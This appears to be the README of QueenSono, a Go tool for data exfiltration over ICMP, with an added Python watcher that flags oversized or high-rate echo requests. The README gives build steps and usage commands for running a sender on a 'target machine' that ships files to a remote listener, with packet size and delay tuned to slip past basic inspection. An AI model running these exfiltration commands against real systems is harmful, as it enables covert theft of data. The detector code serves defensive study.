QueenSono ICMP Data Exfiltration
A Golang package for data exfiltration over the ICMP protocol.
QueenSono relies only on the fact that ICMP traffic is usually not monitored, which is quite common. It can also be used against a system with basic ICMP inspection (i.e. a frequency and content-length watcher). It tries to imitate PyExfil (and others) with the idea that the target machine does not necessarily have Python installed, so providing a standalone binary can be useful.
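The README's own assumption, that ICMP goes unwatched and that the packet size (-s) and send delay (-d) can be tuned around a basic inspector, is exactly what a defender can key on. The following is an added example of such a "frequency and content-length watcher" written for this page; it is not part of QueenSono or of any other project. It parses raw IPv4+ICMP echo requests, flags payloads larger than a normal ping carries, and flags sources that send echo requests faster than a human-driven ping would. The thresholds, source addresses and the packets it inspects are all constructed here for illustration.

```python
import struct
from collections import defaultdict, deque

# Thresholds are assumptions for this example, not values taken from any tool.
# Typical ping payloads are 56 bytes (Linux) or 32 bytes (Windows); an exfil
# tool that packs file chunks into echo requests is far above that.
MAX_ECHO_PAYLOAD = 128       # bytes of ICMP payload before a packet is suspicious
MAX_ECHOES_PER_WINDOW = 20   # echo requests from one source per window
WINDOW_SECONDS = 10.0


def parse_icmp_echo(packet):
    """Parse a raw IPv4 packet. Return (src_ip, icmp_type, payload) or None if not ICMP."""
    if len(packet) < 20:
        return None
    ihl = (packet[0] & 0x0F) * 4          # IPv4 header length in bytes
    protocol = packet[9]
    if protocol != 1 or len(packet) < ihl + 8:   # 1 = ICMP; 8 = ICMP header size
        return None
    src_ip = ".".join(str(b) for b in packet[12:16])
    icmp_type = packet[ihl]
    payload = packet[ihl + 8:]            # bytes after type, code, checksum, id, seq
    return src_ip, icmp_type, payload


class IcmpWatcher:
    """Stateful per-source watcher for oversized or high-rate echo requests."""

    def __init__(self, max_payload=MAX_ECHO_PAYLOAD,
                 max_rate=MAX_ECHOES_PER_WINDOW, window=WINDOW_SECONDS):
        self.max_payload = max_payload
        self.max_rate = max_rate
        self.window = window
        self.history = defaultdict(deque)  # src_ip -> timestamps of recent echo requests

    def observe(self, timestamp, packet):
        """Inspect one packet; return a list of alert strings (empty if nothing is wrong)."""
        parsed = parse_icmp_echo(packet)
        if parsed is None:
            return []
        src_ip, icmp_type, payload = parsed
        if icmp_type != 8:                 # only echo requests are of interest here
            return []
        alerts = []
        if len(payload) > self.max_payload:
            alerts.append(f"oversized echo payload from {src_ip}: {len(payload)} bytes")
        recent = self.history[src_ip]
        recent.append(timestamp)
        while recent and timestamp - recent[0] > self.window:
            recent.popleft()               # drop timestamps outside the sliding window
        if len(recent) > self.max_rate:
            alerts.append(f"high echo-request rate from {src_ip}: "
                          f"{len(recent)} in {self.window}s")
        return alerts


def build_echo_request(src_ip, payload, seq=1, dst_ip="10.0.0.92"):
    """Construct a minimal IPv4+ICMP echo request for testing (checksums left at zero)."""
    total_len = 20 + 8 + len(payload)
    ip_header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 1, 0,
                            bytes(int(o) for o in src_ip.split(".")),
                            bytes(int(o) for o in dst_ip.split(".")))
    icmp_header = struct.pack("!BBHHH", 8, 0, 0, 0x1234, seq)  # type 8 = echo request
    return ip_header + icmp_header + payload


def demo():
    """Run the watcher over constructed traffic: a normal ping and a chunked transfer."""
    watcher = IcmpWatcher()
    alerts = []
    # Constructed benign traffic: one 56-byte echo request per second from 10.0.0.5.
    for i in range(5):
        alerts += watcher.observe(float(i), build_echo_request("10.0.0.5", b"\x00" * 56, i))
    # Constructed suspicious traffic: 1400-byte payloads, 30 packets in 3 seconds from 10.0.0.7.
    for i in range(30):
        alerts += watcher.observe(100.0 + i * 0.1,
                                  build_echo_request("10.0.0.7", b"A" * 1400, i))
    return alerts


if __name__ == "__main__":
    for line in demo():
        print(line)
```

In practice the packets would come from a capture (pcap or a raw socket on the monitoring host) rather than from build_echo_request; the parser and the watcher are unchanged. Tuning the thresholds is the whole game: a sender that keeps its payload under the size limit and its rate under the window limit stays below this watcher, which is why size and frequency checks are best paired with a baseline of what ICMP normally looks like on the network.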
Notes
- only works on Linux (due to the use of the golang net icmp package)
- needs the cap_net_raw capability
Changelog v1.1.2
- Mitigate size length bug #7
Install
Clone the repo and download the dependencies locally:
git clone https://github.com/ariary/QueenSono.git
make before.build
To build the ICMP packet sender qssender :
build.queensono-sender
To build the ICMP packet receiver qsreceiver :
build.queensono-receiver
Usage
qssender is the binary which sends the ICMP packets to the listener, so it is the binary you have to transfer to your target machine.
qsreceiver is the listener on your local machine (or wherever you can receive ICMP packets).
All commands and flags of the binaries can be found using --help
Example 1: Send with “ACK”
> In this example we want to send a big file and watch for echo replies to acknowledge the reception of the packets (ACK).
On the local machine:
$ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt
Explanation
- -l 0.0.0.0 listen on all interfaces for ICMP packets
- -f received_bible.txt save the received data to a file
- -p show a progress bar of the received data
On target machine:
$ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example)
$ qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt
Explanation
- send file for sending a file (bible.txt is the file in question)
- -d 2 send a packet every 2 seconds
- -l 127.0.0.1 the listening address for the echo reply
- -r 10.0.0.92 the address of my remote machine with qsreceiver listening
- -s 50000 the data size I want to send in each packet
Example 2: Send without “ACK”
> In this example we want to send a message without waiting for an echo reply (this can be useful when the target firewall filters incoming ICMP packets).
On the local machine:
$ qsreceiver receive truncated 1 -l 0.0.0.0
Explanation
- receive truncated 1 does not wait indefinitely if we don't receive all the packets (1 is the delay used with qssender)
On the target machine:
$ qssender send "thisisatest i want to send a string w/o waiting for the echo reply" -d 1 -l 127.0.0.1 -r 10.0.0.190 go.mod -s 1 -N
- -N noreply option (don't wait for an echo reply)
Source: https://github.com/ariary/